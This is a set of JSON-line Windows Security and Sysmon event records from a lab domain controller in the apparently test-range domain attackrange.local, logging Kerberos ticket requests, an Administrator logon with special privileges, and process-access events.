{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220640,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220641,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220642,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA5587\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa5587","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220643,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA5587\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa5587","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5392,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5393,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5394,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001016DC0600}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5395,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220644,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220645,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220646,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
